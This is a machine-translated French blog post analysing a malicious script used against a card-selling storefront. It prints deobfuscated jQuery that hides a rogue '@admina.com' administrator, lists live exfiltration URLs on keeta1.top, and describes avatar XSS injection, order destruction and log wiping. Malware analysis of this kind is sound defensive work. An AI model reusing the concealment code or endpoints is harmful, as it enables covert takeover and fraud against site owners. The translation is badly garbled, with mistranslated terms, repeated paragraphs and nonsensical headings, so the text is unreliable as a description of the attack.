Analyse des scripts pour l'exploitation de la vulnérabilité 1 de l'achat de 0 $ en épingle à cheveux bizarre
avant-propos
La raison de l'augmentation récente de l'intensité des achats à zéro dollar ciblant l'hétérodyne est que les auteurs n'ont pas protégé correctement leurs sites web. Selon des net-citoyens enthousiastes ainsi que leur propre script d'exploitation de vulnérabilité capturé, la présente série d'articles d'analyse d'écriture. L'auteur de cet article a utilisé un script de vulnérabilité, le code xss d'injection d'avatar, puis a utilisé la peur de l'administrateur d'être piraté pour voir les journaux d'arrière-plan de la psychologie, en concevant un code malveillant à ce moment-là, afin d'utiliser les privilèges de l'administrateur pour atteindre l'objectif de l'achat de zéro yuan.
La raison de l'augmentation récente de l'intensité des achats à zéro dollar ciblant l'hétérodyne est que les auteurs n'ont pas protégé leurs sites web correctement. Sur la base d'utilisateurs enthousiastes et de leurs propres scripts d'exploitation des vulnérabilités capturées, nous rédigeons cette série d'articles d'analyse.
Il est vrai qu'il ne faut pas avoir peur d'être piraté tant que l'on n'a pas de revenus quotidiens et que l'on n'a pas de cartes.
déclare par la présente
Afin d'éviter toute exploitation malveillante, tous les codes et descriptions de ce billet ont été brouillés.
esquissée
Dans cet article, l'auteur du script de vulnérabilité utilise le code xss d'injection d'avatar, puis utilise la peur de l'administrateur d'être piraté pour consulter les journaux d'arrière-plan de la psychologie, la conception du code malveillant à ce moment-là pour l'exécuter, afin d'utiliser l'autorité de l'administrateur pour atteindre l'objectif de l'achat zéro.
code dissection
Adresse du script du code malveillant
https://jiaoben.keeta1.top/
Je l'ai téléchargé et j'ai constaté qu'il était obscurci, une simple désobfuscation.
Le processus n'est pas montré, le code suivant n'est décrypté qu'à un niveau lisible afin d'éviter toute exploitation.
La structure générale est la suivante
Commencez par ajouter un administrateur avec @admina.com !
$("td")["each"](function (_0x36ba71, _0x348775) {
console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
if (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
var _0x53991d = $(this)["parent"]() ;
_0x53991d["remove"]().
}
})
L'idée est de parcourir toutes les tables et, si une table contient une valeur contenant @admina.com, de supprimer son élément parent.
Il se trouve que la liste des administrateurs est un tableau, de sorte que l'administrateur contenant @admina.com peut être caché. Cela signifie que l'administrateur n'est pas du tout visible dans le backend, mais seulement dans la base de données.
Après avoir exécuté les résultats comme indiqué ci-dessus, la gestion a disparu.
Le seul inconvénient est que la ligne inférieure, "Show records 1 to 1, total 1 records", devrait être réduite d'une unité. Sinon, cela ne fonctionne pas.
Il y a aussi la fonction de piratage des clés.
Tout d'abord, en fonction du titre, déterminer si l'interface du journal des opérations en arrière-plan
Une minuterie sera alors activée pour exécuter le code malveillant.
Le code malveillant contenu dans la minuterie ne sera pas exécuté s'il ne se trouve pas dans l'interface de l'opérateur de journalisation en arrière-plan.
Demandez d'abord à la carte de trouver l'identifiant de l'utilisateur avec le nom d'utilisateur toptoones.
Ensuite, sur la base de l'identifiant renvoyé, procédez comme suit
Supprimer d'abord cet utilisateur
Appelez ensuite le plugin de destruction de commande pour détruire la commande de cet utilisateur.
Si vous n'avez pas installé ce plugin, cet ancien 6 sera également capable d'appeler l'api pour vous aider à télécharger depuis la boutique de plugins, activer le plugin, détruire la commande, fermer le plugin, désinstaller le plugin, et au passage pour vous aider à effacer les journaux d'arrière-plan.
Il injecte ensuite le code de l'avatar de l'administrateur à l'endroit indiqué au début, qui cache l'administrateur malveillant, de sorte que dès que vous vous connectez au backend, le code malveillant est déclenché.
Il téléchargera ensuite vos informations dans son backend.
https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp
Ensuite, il vérifiera s'il y a un plugin de paiement facile dans le backend et injectera du code si c'est le cas. Je pense que j'aurais dû essayer de changer la configuration du paiement, mais je ne l'ai pas fait pour une raison quelconque, et je vais probablement poursuivre avec une mise à jour.
Il gère également avec soin le gardiennage de l'arrière-plan
Enfin, il y a toutes sortes d'opérations de nettoyage des journaux et de transfert de données.
résumés
renonciationfantasmer(Interdimensionnel)
voir la réalité
Prenez une autre brosse à cheveux, l'auteur ne s'est même pas présenté.
转载请注明:Bizarre carte à cheveux 0 yuan achat vulnérabilité exploit script analysis-1 | MJJ hair card navigation